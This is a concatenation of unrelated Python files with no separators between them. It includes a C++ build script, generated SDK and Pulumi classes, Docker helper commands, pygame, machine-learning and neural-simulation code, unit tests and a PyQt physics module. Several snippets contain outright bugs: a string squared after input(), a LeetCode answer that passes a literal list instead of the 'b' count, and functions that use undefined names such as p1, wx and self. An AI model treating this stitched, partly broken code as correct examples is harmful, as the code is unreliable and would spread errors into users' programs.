#!/usr/bin/python3 import pathlib import os import subprocess import yaml FILENAME = 'xmake.yml' CONFIG = '.git' OUTDIR = '.out' def repo_abs_path(): d = pathlib.Path.cwd() while not (d / CONFIG).exists(): d = d.parent return d def curr_rel_path(): d = pathlib.Path.cwd() return d.relative_to(repo_abs_path()) def prefix_to_rel_path(prefix): return prefix.relative_to(pathlib.PurePath('//')) def prefix_to_abs_path(prefix): return repo_abs_path() / prefix_to_rel_path(prefix) def rel_path_to_prefix(rel_path): return pathlib.PurePath('//') / rel_path def curr_prefix(): return rel_path_to_prefix(curr_rel_path()) def prefix_to_abs_out_name(prefix): abs_path = prefix_to_abs_path(prefix) name = abs_path.name dep_dir = abs_path.parent return dep_dir / OUTDIR / name def cmd_run(command): print(' '.join(command)) subprocess.run(command) def do_cpp(name, props): CC = 'clang++' AR = 'ar' LINKER = 'ld' OPT = '-O3' G = '-g0' STD = '-std=c++20' INCLUDE = '-I' + str(repo_abs_path()) PTHREAD = '-pthread' if 'main' not in props: props['main'] = False if 'hdrs' not in props: props['hdrs'] = list() if 'srcs' not in props: props['srcs'] = list() srcs = props['srcs'] hdrs = props['hdrs'] main = props['main'] deps = props['deps'] rule_dir = prefix_to_abs_path(name).parent target_out = rule_dir / OUTDIR target_out.mkdir(exist_ok=True) # The objects we'll link against in this rule. This includes the source # objects and the lib files we depend on. objects = list() # Compile the sources. for src in srcs: src_path = rule_dir / src dot_o = (target_out / src).with_suffix('.o') cmd_run([ CC, OPT, # G, STD, INCLUDE, '-c', str(src_path), '-o', str(dot_o) ]) objects.append(str(dot_o)) # Get the compiled dependencies. They should have been compiled outside this # function. for dep in deps: dot_a = prefix_to_abs_out_name(dep).with_suffix('.a') objects.append(str(dot_a)) # Link everything or archive everything. out_name = prefix_to_abs_out_name(name) if main: cmd_run([CC, PTHREAD, '-o', str(out_name)] + objects) else: cmd_run([AR, 'rcsuUPT', str(out_name.with_suffix('.a'))] + objects) def load_prefix(prefix): print('[Loading]', prefix) prop_dict = dict() rel_path = prefix_to_rel_path(prefix) abs_path = repo_abs_path() / rel_path with (abs_path / FILENAME).open() as f: rules = yaml.safe_load(f) for name, props in rules.items(): canonical_name = prefix / name # Canonicalize deps. deps = props['deps'] if 'deps' in props else list() dep_paths = (pathlib.PurePath(dep) for dep in deps) canonical_deps = (dep_path if dep_path.is_absolute() else prefix / dep_path for dep_path in dep_paths) props['deps'] = set(canonical_deps) prop_dict[canonical_name] = props return prop_dict loaded_prefixes = set() prop_dict = load_prefix(curr_prefix()) loaded_prefixes.add(curr_prefix()) targets = set() size = 0 while size != len(prop_dict): size = len(prop_dict) new_dict = dict() for target, props in prop_dict.items(): deps = props['deps'] for dep in deps: prefix = dep.parent if prefix not in loaded_prefixes: new_dict.update(load_prefix(prefix)) loaded_prefixes.add(prefix) targets.add(target) prop_dict.update(new_dict) done_targets = set() # Nothing fancy. Keep looping over the rules to see which ones have all # dependencies done. Note names are canonical names already. while targets != done_targets: for target, props in prop_dict.items(): deps = props['deps'] if all(dep in done_targets for dep in deps) and target not in done_targets: print("[Doing]", target) do_cpp(target, prop_dict[target]) done_targets.add(target)
# coding: utf-8 """ Isilon SDK Isilon SDK - Language bindings for the OneFS API # noqa: E501 OpenAPI spec version: 9 Contact: sdk@isilon.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class HdfsInotifySettingsSettings(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'enabled': 'bool', 'maximum_delay': 'int', 'retention': 'int' } attribute_map = { 'enabled': 'enabled', 'maximum_delay': 'maximum_delay', 'retention': 'retention' } def __init__(self, enabled=None, maximum_delay=None, retention=None): # noqa: E501 """HdfsInotifySettingsSettings - a model defined in Swagger""" # noqa: E501 self._enabled = None self._maximum_delay = None self._retention = None self.discriminator = None if enabled is not None: self.enabled = enabled if maximum_delay is not None: self.maximum_delay = maximum_delay if retention is not None: self.retention = retention @property def enabled(self): """Gets the enabled of this HdfsInotifySettingsSettings. # noqa: E501 Enable or disable the collection of edits over HDFS and access to the edits via HDFS INotify stream. # noqa: E501 :return: The enabled of this HdfsInotifySettingsSettings. # noqa: E501 :rtype: bool """ return self._enabled @enabled.setter def enabled(self, enabled): """Sets the enabled of this HdfsInotifySettingsSettings. Enable or disable the collection of edits over HDFS and access to the edits via HDFS INotify stream. # noqa: E501 :param enabled: The enabled of this HdfsInotifySettingsSettings. # noqa: E501 :type: bool """ self._enabled = enabled @property def maximum_delay(self): """Gets the maximum_delay of this HdfsInotifySettingsSettings. # noqa: E501 The maximum duration in seconds until an edit event is reported in INotify. The default is 60, which amounts to a minute. # noqa: E501 :return: The maximum_delay of this HdfsInotifySettingsSettings. # noqa: E501 :rtype: int """ return self._maximum_delay @maximum_delay.setter def maximum_delay(self, maximum_delay): """Sets the maximum_delay of this HdfsInotifySettingsSettings. The maximum duration in seconds until an edit event is reported in INotify. The default is 60, which amounts to a minute. # noqa: E501 :param maximum_delay: The maximum_delay of this HdfsInotifySettingsSettings. # noqa: E501 :type: int """ if maximum_delay is not None and maximum_delay > 2147483647: # noqa: E501 raise ValueError("Invalid value for `maximum_delay`, must be a value less than or equal to `2147483647`") # noqa: E501 if maximum_delay is not None and maximum_delay < 0: # noqa: E501 raise ValueError("Invalid value for `maximum_delay`, must be a value greater than or equal to `0`") # noqa: E501 self._maximum_delay = maximum_delay @property def retention(self): """Gets the retention of this HdfsInotifySettingsSettings. # noqa: E501 The minimum amount of time in seconds the edits will be retained. The default is 172800, which amounts to 48hr. # noqa: E501 :return: The retention of this HdfsInotifySettingsSettings. # noqa: E501 :rtype: int """ return self._retention @retention.setter def retention(self, retention): """Sets the retention of this HdfsInotifySettingsSettings. The minimum amount of time in seconds the edits will be retained. The default is 172800, which amounts to 48hr. # noqa: E501 :param retention: The retention of this HdfsInotifySettingsSettings. # noqa: E501 :type: int """ if retention is not None and retention > 2147483647: # noqa: E501 raise ValueError("Invalid value for `retention`, must be a value less than or equal to `2147483647`") # noqa: E501 if retention is not None and retention < 0: # noqa: E501 raise ValueError("Invalid value for `retention`, must be a value greater than or equal to `0`") # noqa: E501 self._retention = retention def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, HdfsInotifySettingsSettings): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
# system import logging import subprocess # local from ..config import LoadedConfig from ..executable import Executable from ..projects import Projects from ..rootkit import Rootkit, prefix_path_mnt from ..subcommand import SubCommand class ConfCopyCommand(SubCommand): """kiwi conf-copy""" def __init__(self): super().__init__( 'conf-copy', action="Syncing all configs for", add_parser=False, description="Synchronize all config files to target directory" ) def _run_instance(self, runner, args): conf_dirs = [ project.conf_dir_name() for project in Projects.from_dir().filter_enabled() if project.has_configs() ] if conf_dirs: # add target directory conf_dirs.append(LoadedConfig.get()['runtime:storage']) logging.info(f"Sync directories: {conf_dirs}") Rootkit('rsync').run([ 'rsync', '-rpt', '--delete', *prefix_path_mnt(conf_dirs) ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) return True def _find_net(net_name): ps = Executable('docker').run([ 'network', 'ls', '--filter', f"name={net_name}", '--format', '{{.Name}}' ], stdout=subprocess.PIPE) net_found = str(ps.stdout, 'utf-8').strip() return net_found == net_name class NetUpCommand(SubCommand): """kiwi net-up""" def __init__(self): super().__init__( 'net-up', action="Creating the local network hub for", add_parser=False, description="Create the local network hub for this instance" ) def _run_instance(self, runner, args): config = LoadedConfig.get() net_name = config['network:name'] net_cidr = config['network:cidr'] if _find_net(net_name): logging.info(f"Network '{net_name}' already exists") return True try: Executable('docker').run([ 'network', 'create', '--driver', 'bridge', '--internal', '--subnet', net_cidr, net_name ], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) logging.info(f"Network '{net_name}' created") except subprocess.CalledProcessError: logging.error(f"Error creating network '{net_name}'") return False return True
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import json import warnings import pulumi import pulumi.runtime from typing import Union from .. import utilities, tables class Variable(pulumi.CustomResource): name: pulumi.Output[str] """ The name of the variable to manage. Note that variable names can be hierarchical using slashes (e.g. "prod-variables/hostname"). """ parent: pulumi.Output[str] """ The name of the RuntimeConfig resource containing this variable. """ project: pulumi.Output[str] """ The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """ text: pulumi.Output[str] update_time: pulumi.Output[str] """ (Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z". """ value: pulumi.Output[str] def __init__(__self__, resource_name, opts=None, name=None, parent=None, project=None, text=None, value=None, __props__=None, __name__=None, __opts__=None): """ Manages a RuntimeConfig variable in Google Cloud. For more information, see the [official documentation](https://cloud.google.com/deployment-manager/runtime-configurator/), or the [JSON API](https://cloud.google.com/deployment-manager/runtime-configurator/reference/rest/). :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] name: The name of the variable to manage. Note that variable names can be hierarchical using slashes (e.g. "prod-variables/hostname"). :param pulumi.Input[str] parent: The name of the RuntimeConfig resource containing this variable. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. > This content is derived from https://github.com/terraform-providers/terraform-provider-google/blob/master/website/docs/r/runtimeconfig_variable.html.markdown. """ if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() __props__['name'] = name if parent is None: raise TypeError("Missing required property 'parent'") __props__['parent'] = parent __props__['project'] = project __props__['text'] = text __props__['value'] = value __props__['update_time'] = None super(Variable, __self__).__init__( 'gcp:runtimeconfig/variable:Variable', resource_name, __props__, opts) @staticmethod def get(resource_name, id, opts=None, name=None, parent=None, project=None, text=None, update_time=None, value=None): """ Get an existing Variable resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param str id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] name: The name of the variable to manage. Note that variable names can be hierarchical using slashes (e.g. "prod-variables/hostname"). :param pulumi.Input[str] parent: The name of the RuntimeConfig resource containing this variable. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] update_time: (Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z". > This content is derived from https://github.com/terraform-providers/terraform-provider-google/blob/master/website/docs/r/runtimeconfig_variable.html.markdown. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() __props__["name"] = name __props__["parent"] = parent __props__["project"] = project __props__["text"] = text __props__["update_time"] = update_time __props__["value"] = value return Variable(resource_name, opts=opts, __props__=__props__) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
#!/usr/bin/env python import os.path import logging import locales _ = locales._ from gui_image_opener import toAbsPath, getBackground PATH_BACKGROUNDS = toAbsPath('backgrounds/gif') pattern_fn = 'irka3_{fld}{scheme}.fld' TITLE_BORDER = _("BG Border") TITLE_TOUCHED = _("BG Touched") TITLE_UNTOUCHED = _("BG Untouched") CATEGORY_BORDER = list() CATEGORY_TOUCHED = list() CATEGORY_UNTOUCHED = list() def getBackgrounds(): l = os.listdir(PATH_BACKGROUNDS) for fn in l: if fn[0] == '.': logging.debug(_("ignoring hidden file {fn} in {path}").format(fn=fn, path=PATH_IMAGES)) continue fn = os.path.splitext(fn)[0] + ".fld" yield fn CATEGORY_ALL = list(getBackgrounds()) CATEGORY_ALL.sort() for bg in CATEGORY_ALL: short = getBackground.getShortName(bg) if "1" in short: CATEGORY_BORDER.append(bg) elif "2" in short: CATEGORY_UNTOUCHED.append(bg) elif "3" in short: CATEGORY_TOUCHED.append(bg) else: logging.error("background with invalid name can not be categorized: %r" % (bg,)) categories = ( #(_("Background"), CATEGORY_ALL), (TITLE_BORDER, CATEGORY_BORDER), (TITLE_UNTOUCHED, CATEGORY_UNTOUCHED), (TITLE_TOUCHED, CATEGORY_TOUCHED), ) if __name__=='__main__': print(CATEGORY_ALL)
x = input( "enter number:") sroot = x ** 2 print sroot
import pygame class Button(pygame.sprite.Sprite): def __init__( self, id_: int, image_path: str, rect: pygame.Rect, color: pygame.Color, highlight_color: pygame.Color, text: str, font_size: int, text_color: pygame.Color, highlight_text_color: pygame.Color = None ): """Initialize the button Args: id_ (int): the id of the button rect (pygame.Rect): the rect of the button color (pygame.Color): the color of the button highlight_color (pygame.Color): the color of the button when hovered text (str): the text of the button text_color (pygame.Color): the color of the text """ super().__init__() self.id = id_ self.rect = pygame.Rect(rect) # Set the colors self.color = color self.highlight_color = highlight_color # Create the image self.image = pygame.image.load(image_path).convert_alpha() self.image = pygame.transform.scale(self.image, (self.rect.width, self.rect.height)) # Set the text self.text = text self.text_color = text_color self.highlight_text_color = highlight_text_color # Set the font # self.font = pygame.font.SysFont("Bauhaus 93", font_size) self.font = pygame.font.SysFont("Impact", font_size) # Set the text position self.text_pos = (self.rect.centerx - self.font.size(self.text)[0] / 2, self.rect.centery - self.font.size(self.text)[1] / 2) @property def hover(self) -> bool: """Check if the mouse is hovering over the button Returns: bool: True if the mouse is hovering over the button, False otherwise """ return self.rect.collidepoint(pygame.mouse.get_pos()) @property def pressed(self) -> bool: """Check if the button is pressed Returns: bool: True if the button is pressed, False otherwise """ return pygame.mouse.get_pressed()[0] and self.hover def draw(self, surface: pygame.Surface): """Draw the button Args: surface (pygame.Surface): the surface to draw the button on """ # Copy the image image = self.image.copy() text_color = self.text_color # If the mouse is hovering over the button, change the color if self.hover: image.fill(self.highlight_color, special_flags=pygame.BLEND_RGBA_MULT) if self.highlight_text_color is not None: text_color = self.highlight_text_color else: image.fill(self.color, special_flags=pygame.BLEND_RGBA_MULT) # Draw the image and text surface.blit(image, self.rect) surface.blit(self.font.render(self.text, True, text_color), self.text_pos)
from sklearn.metrics import accuracy_score, precision_recall_fscore_support import numpy as np import torch def tc_compute_metrics(pred): labels = pred.label_ids preds = pred.predictions.argmax(-1) precision, recall, f1, _ = precision_recall_fscore_support(labels, preds, average='binary') simple_accuracy = (preds == labels).mean() acc = accuracy_score(labels, preds) return { 'accuracy': acc, 'f1': f1, 'precision': precision, 'recall': recall, 'simple_accuracy': simple_accuracy } def rp_compute_metrics(pred): labels = pred.label_ids preds = pred.predictions.argmax(-1) simple_accuracy = (preds == labels).mean() ranks = [] hits = [] for i in range(10): hits.append([]) for i, pred in enumerate(pred.predictions): rel_values = torch.tensor(pred) _, argsort1 = torch.sort(rel_values, descending=True) argsort1 = argsort1.cpu().numpy() rank = np.where(argsort1 == labels[i])[0][0] ranks.append(rank + 1) for hits_level in range(10): if rank <= hits_level: hits[hits_level].append(1.0) else: hits[hits_level].append(0.0) metrics_with_values = { 'raw_mean_rank': np.mean(ranks), 'simple_accuracy': simple_accuracy } for i in [0, 2, 9]: metrics_with_values[f'raw_hits @{i + 1}'] = np.mean(hits[i]) return metrics_with_values def htp_compute_metrics(pred): labels = pred.label_ids preds = pred.predictions.argmax(-1) simple_accuracy = (preds == labels).mean() ranks = [] ranks_left = [] ranks_right = [] hits_left = [] hits_right = [] hits = [] top_ten_hit_count = 0 for i in range(10): hits_left.append([]) hits_right.append([]) hits.append([]) for triple_id in range(0, len(labels), 41): preds = pred.predictions[triple_id:triple_id+41, 1] rel_values = torch.tensor(preds) _, argsort1 = torch.sort(rel_values, descending=True) argsort1 = argsort1.cpu().numpy() rank1 = np.where(argsort1 == 0)[0][0] ranks.append(rank1 + 1) ranks_left.append(rank1 + 1) if rank1 < 10: top_ten_hit_count += 1 rel_values = torch.tensor(preds) _, argsort1 = torch.sort(rel_values, descending=True) argsort1 = argsort1.cpu().numpy() rank2 = np.where(argsort1 == 0)[0][0] ranks.append(rank2 + 1) ranks_right.append(rank2 + 1) if rank2 < 10: top_ten_hit_count += 1 for hits_level in range(10): if rank1 <= hits_level: hits[hits_level].append(1.0) hits_left[hits_level].append(1.0) else: hits[hits_level].append(0.0) hits_left[hits_level].append(0.0) if rank2 <= hits_level: hits[hits_level].append(1.0) hits_right[hits_level].append(1.0) else: hits[hits_level].append(0.0) hits_right[hits_level].append(0.0) metrics_with_values = { 'simple_accuracy': simple_accuracy, } for i in [0, 2, 9]: metrics_with_values[f'hits_left_@{i+1}'] = np.mean(hits_left[i]) metrics_with_values[f'hits_right_@{i + 1}'] = np.mean(hits_right[i]) metrics_with_values[f'hits_@{i + 1}'] = np.mean(hits[i]) metrics_with_values[f'mean_rank_left'] = np.mean(ranks_left) metrics_with_values[f'mean_rank_right'] = np.mean(ranks_right) metrics_with_values[f'mean_rank'] = np.mean(ranks) metrics_with_values['mean_reciprocal_rank_left'] = np.mean(1. / np.array(ranks_left)) metrics_with_values['mean_reciprocal_rank_right'] = np.mean(1. / np.array(ranks_right)) metrics_with_values['mean_reciprocal_rank'] = np.mean(1. / np.array(ranks)) return metrics_with_values
from .gathering_env import GatheringEnv import torch class SingleAgentGatheringEnv(GatheringEnv): def __init__(self, cfg): assert cfg.no_agents == 1, "Config not configured for 1 agent." super(SingleAgentGatheringEnv, self).__init__(cfg) def reset(self): self._record_ep = False self.ep_cnt += 1 self.step_cnt = 0 observation = self._reset() self.prev_observation = observation return observation[0] def restart_game(self, record_episode=False): obs = self.reset() reward = 0 self._record_ep = record_episode if record_episode: self.recorded_data = self.init_ep_record_data() return obs, reward, False def get_recorded_data(self): return self.record_data def step(self, action): observation, reward, done = self._step(torch.LongTensor([action])) self.step_cnt += 1 if self.step_cnt >= self.max_steps: done = torch.ones(self.no_agents).byte() if self._record_ep: self.record_step_data(observation, reward, done) self.prev_observation = observation return observation[0], reward[0].item(), done[0].item(), {}
#!/usr/bin/env python import sys sys.path.append('/opt/lib/python2.7/site-packages/') import math import numpy as np import pylab import nest import nest.raster_plot import nest.topology as tp nest.ResetKernel() nest.SetKernelStatus({'local_num_threads': 8}) a = { "tau_m" : 20.0, "V_th" : -55.0, "E_L" : -65.0, "t_ref" : 2.0, "V_reset" : -75.0, "C_m" : 250.0, "V_m" : 0.0, } alpha = { "tau_m" : 20.0, "V_th" : -55.0, "E_L" : -65.0, "t_ref" : 2.0, "V_reset" : -75.0, "C_m" : 250.0, "V_m" : 0.0, } beta = { "tau_m" : 20.0, "V_th" : -55.0, "E_L" : -65.0, "t_ref" : 2.0, "V_reset" : -75.0, "C_m" : 250.0, "V_m" : 0.0, } gamma = { "tau_m" : 6.0, "V_th" : -55.0, "E_L" : -65.0, "t_ref" : 2.0, "V_reset" : -75.0, "C_m" : 250.0, "V_m" : 0.0, } # The population sizes # The total population of layer 4 of area W layer_4_population = 1000 # ratio of number of excitatory to inhibitory neurons (alpha/beta) alpha_beta_ratio = 0.5 # A dict of all the populations population_sizes = [ 2*layer_4_population, # area A alpha_beta_ratio*layer_4_population, # alpha excitatory neurons of layer 4 of area W (1-alpha_beta_ratio)*layer_4_population, # beta inhibitory neurons of layer 4 of area W 0.03*layer_4_population # gamma excitatory neurons of area W ] # An array of all the areas population_properties = [a, alpha, beta, gamma] simulation_time = 1000 radius = float(int(math.sqrt(layer_4_population)/10)*10) # Create the neuronal populations noises = [] # todo spike_detectors = [] layers = [] for ctr in xrange(len(population_properties)): nest.CopyModel('iaf_psc_alpha', 'neuron'+str(ctr), population_properties[ctr]) pop = math.sqrt(population_sizes[ctr]) l = tp.CreateLayer({ 'rows': int(pop), 'columns': int(pop), 'elements': 'neuron'+str(ctr), 'extent': [radius, radius], 'edge_wrap': True }) layers.append(l) # Create the input source (how? - connect mic?) # For list of all synapse types, execute nest.Models('synapses') # nest.CopyModel('stdp_synapse', 'excitatory', {'mu_plus': 1.0, 'mu_minus':1.0}) # nest.CopyModel('stdp_synapse', 'inhibitory', {'mu_plus': -1.0, 'mu_minus':-1.0}) nest.CopyModel('static_synapse', 'excitatory') nest.CopyModel('static_synapse', 'inhibitory') # Connection topologies tonotopic_excitatory = { 'connection_type': 'divergent', # 'mask': { # 'doughnut': { # 'inner_radius': radius/10, # 'outer_radius': radius # } # # 'circular': {'radius': radius} # }, 'weights': { # 'gaussian': { # 'p_center': 1.0, # 'sigma': 10.0 # } 'uniform': { 'min': 0.0, 'max': 1.0 } }, 'allow_oversized_mask': True, # 'kernel': { # 'gaussian': { # 'p_center': 1.0, # 'sigma': 1.0 # } # }, 'synapse_model': 'excitatory' } tonotopic_excitatory_noSTDP = { 'connection_type': 'divergent', 'mask': { 'circular': { 'radius': radius/2 } }, 'allow_oversized_mask': True, 'kernel': { 'gaussian': { 'p_center': 1.0, 'sigma': 1.0 } } } excitatory = { 'connection_type': 'divergent', 'synapse_model': 'excitatory', 'weights': { 'uniform': { 'min': 0.0, 'max': 0.1 } } } excitatory_layerW = { 'connection_type': 'divergent', 'synapse_model': 'excitatory', 'weights': { 'uniform': { 'min': 0.0, 'max': 1.0 } } } excitatory_topological = { 'connection_type': 'divergent', 'synapse_model': 'excitatory', 'weights': { 'uniform': { 'min': 0.0, 'max': 5.0 } }, 'kernel': { 'gaussian': { 'p_center': 1.0, 'sigma': radius/2 } } } inhibitory_layerW = { 'connection_type': 'divergent', 'synapse_model': 'inhibitory', 'weights': { 'uniform': { 'min': -5.0, 'max': 0.0 } } } inhibitory_delay_layerW = { 'connection_type': 'divergent', 'synapse_model': 'inhibitory', 'weights': { 'uniform': { 'min': -5.0, 'max': 0.0 } } } inhibitory = { 'connection_type': 'divergent', 'synapse_model': 'inhibitory', 'weights': { 'uniform': { 'min': -0.1, 'max': 0.0 } } } inhibitory_topolocical = { 'connection_type': 'divergent', 'synapse_model': 'inhibitory', 'weights': { 'uniform': { 'min': -0.1, 'max': 0.0 } }, 'kernel': { 'gaussian': { 'p_center': 1.0, 'sigma': radius/2 } } } # Area A to layer 4 of area W connectionso tp.ConnectLayers(layers[0], layers[1], excitatory_topological) tp.ConnectLayers(layers[0], layers[2], excitatory_topological) # Layer 4 Area W interconnections tp.ConnectLayers(layers[2], layers[1], inhibitory_layerW) tp.ConnectLayers(layers[1], layers[2], excitatory_layerW) tp.ConnectLayers(layers[1], layers[1], excitatory_layerW) # tp.ConnectLayers(layers[2], layers[2], inhibitory) # Layer 4 to layer 5/6 of Area W connections tp.ConnectLayers(layers[1], layers[3], excitatory_layerW) tp.ConnectLayers(layers[1], layers[3], inhibitory_layerW) # Provide inputs nest.CopyModel('ac_generator', 'ac', {'amplitude': 200.0, 'frequency': 20.0}) nest.CopyModel('ac_generator', 'ac2', {'amplitude': 50.0, 'frequency': 3.0}) nest.CopyModel('dc_generator', 'dc', {'amplitude': 100.0}) ac_rows = 1 ac = tp.CreateLayer({ 'rows': ac_rows, 'columns': ac_rows, 'elements': ['ac', 'ac2'], 'extent': [radius, radius] }) nest.CopyModel('noise_generator', 'noises', {'mean': 0.0, 'std': 200.0}) noise = tp.CreateLayer({ 'rows': ac_rows, 'columns': ac_rows, 'elements': 'noises', 'extent': [radius, radius] }) # Create a raster plotter spike_rows = int(math.sqrt(population_sizes[len(population_sizes)-1])) spikes = tp.CreateLayer({ 'rows': spike_rows, 'columns': spike_rows, 'elements': 'spike_detector', 'extent': [radius, radius] }) # tp.PlotLayer(layers[2]) tp.ConnectLayers(ac, layers[0], {'connection_type': 'divergent'}) # tp.ConnectLayers(ac, layers[2], {'connection_type': 'divergent'}) tp.ConnectLayers(noise, layers[0], {'connection_type': 'divergent'}) # tp.ConnectLayers(noise, layers[2], {'connection_type': 'divergent'}) tp.ConnectLayers(layers[0], spikes, {'connection_type': 'convergent'}) tp.ConnectLayers(layers[1], spikes, {'connection_type': 'convergent'}) tp.ConnectLayers(layers[2], spikes, {'connection_type': 'convergent'}) tp.ConnectLayers(layers[3], spikes, {'connection_type': 'convergent'}) nest.Simulate(simulation_time) spike_id = spikes[0]+1 spike_ids = tuple([x for x in xrange(spike_id, spike_id+(spike_rows*spike_rows))]) nest.raster_plot.from_device(spike_ids) pylab.show() n1 = p1._e[0] + 1 n1id = tuple([x for x in xrange(n1, int(n1+(p1._extent*p1._extent)))]) n1c = nest.GetConnections(n1id) w1 = nest.GetStatus(n1c, 'weight') pylab.hist(w1, bins=100) pylab.show() n2 = p1._i[0] + 1 n2id = tuple([x for x in xrange(n2, int(n2+(p1._extent*p1._extent)))]) n2c = nest.GetConnections(n2id) w2 = nest.GetStatus(n2c, 'weight') pylab.hist(w2, bins=100) pylab.show()
class Solution: def maxNumberOfBalloons(self, text: str) -> int: d = Counter(text) return min(['b'], d['a'], d['l']//2, d['o']//2, d['n'])
""" table object reference count """ a="nyc" b="nyc" print(a) a=123 print(a) print(b) b=456 print(b) c='nyc' d=c print(c==d) print(d is c)
from unittest import mock, main, TestCase from api.handlers import HttpHandlers class TestHttpHandlers(TestCase): "test class for HttpHandlers" def test_valid_visits_1(self): "succesfully call the endpoint, key has not yet been setup in Redis" m_redis_client = mock.MagicMock() m_redis_client.get.return_value = None m_redis_client.mset.return_value = None HttpHandlers.redis_client = m_redis_client result_body, result_code = HttpHandlers.visits() self.assertIn("visits", result_body) self.assertEqual(result_body["visits"], 1) self.assertEqual(result_code, HttpHandlers.HTTP_STATUS_OK) def test_valid_visits_2(self): "succesfully call the endpoint, key has already been setup in Redis" m_redis_client = mock.MagicMock() m_redis_client.get.return_value = b"2" m_redis_client.mset.return_value = None HttpHandlers.redis_client = m_redis_client result_body, result_code = HttpHandlers.visits() self.assertIn("visits", result_body) self.assertEqual(result_body["visits"], 3) self.assertEqual(result_code, HttpHandlers.HTTP_STATUS_OK) @mock.patch('api.handlers.logging.error', return_value=None) def test_invalid_visits_1(self, m_logerr): "error when attempting to get the key from redis" m_redis_client = mock.MagicMock() m_redis_client.get.side_effect = RuntimeError("Test Redis Exception") HttpHandlers.redis_client = m_redis_client result_body, result_code = HttpHandlers.visits() self.assertIn("error", result_body) self.assertEqual(result_code, HttpHandlers.HTTP_STATUS_INTERNAL_SERVER_ERROR) @mock.patch('api.handlers.logging.error', return_value=None) def test_invalid_visits_2(self, m_logerr): "error when attempting to get the key from redis" HttpHandlers.redis_client = None result_body, result_code = HttpHandlers.visits() self.assertIn("error", result_body) self.assertEqual(result_code, HttpHandlers.HTTP_STATUS_INTERNAL_SERVER_ERROR)
import pytest import anthpy.strings @pytest.mark.parametrize("input_str,expected", [ ("/path/to/file.txt", ["/path/to", "file", ".txt"]), ("file.txt", ["", "file", ".txt"]), ("/path/file", ["/path", "file", ""]), ("", ["", "", ""]), ]) def test_file_parts(input_str, expected): assert expected == anthpy.strings.file_parts(input_str)
from __future__ import print_function, division, absolute_import """ Physics Routines for aporbit ============================ """ import numpy as np import aphla as ap from PyQt4.QtCore import QObject, Qt, QSettings, QSize, QThread, SIGNAL from PyQt4.QtGui import QApplication, QBrush, QMdiArea, QMessageBox, QPen, QDialog import PyQt4.Qwt5 as Qwt from elempickdlg import ElementPickDlg from orbitcorrdlg import OrbitCorrDlg from aporbitplot import ApMdiSubPlot from apbba import ApBbaDlg import cothread import time import logging _logger = logging.getLogger(__name__) def chooseElement(fam): elems = ap.getElements(fam) allelems = [(e.name, Qt.Checked) if e.isEnabled() else (e.name, Qt.Unchecked) for e in elems] enabled_0 = [i for i,e in enumerate(elems) if e.isEnabled()] extra_cols = [('s [m]', [e.sb for e in elems])] form = ElementPickDlg(allelems, title="Choose {0}".format(fam), extra_cols = extra_cols) if form.exec_(): enabled = form.checkedIndices() el0, el1 = [], [] for i,e in enumerate(elems): if i in enabled_0 and i not in enabled: el0.append(i) elif i not in enabled_0 and i in enabled: el1.append(i) if i in enabled: e.setEnabled(True) else: e.setEnabled(False) if el0: _logger.info("{0} {1} '{2}' are disabled".format( len(el0), fam, [elems[i].name for i in el0])) if el1: _logger.info("{0} {1} '{2}' are enabled".format( len(el1), fam, [elems[i].name for i in el1])) def openLocalBump(): """create local bump""" corbitdlg = OrbitCorrDlg( ap.getElements(wx.data.names()), s, x, y, xunit = xunit, yunit=yunit, stepsize = 200e-6, orbit_plots=(wx, wy), correct_orbit = self.correctOrbit) #corbitdlg.resize(600, 500) corbitdlg.setWindowTitle("Create Local Bump") corbitdlg.show() corbitdlg.raise_() corbitdlg.activateWindow() class ApOrbitPhysics: def __init__(self, mdiarea, **kwargs): self.mdiarea = mdiarea self.iqtApp = kwargs.get("iqt", None) self.deadelems = set() self.corbitdlg = None 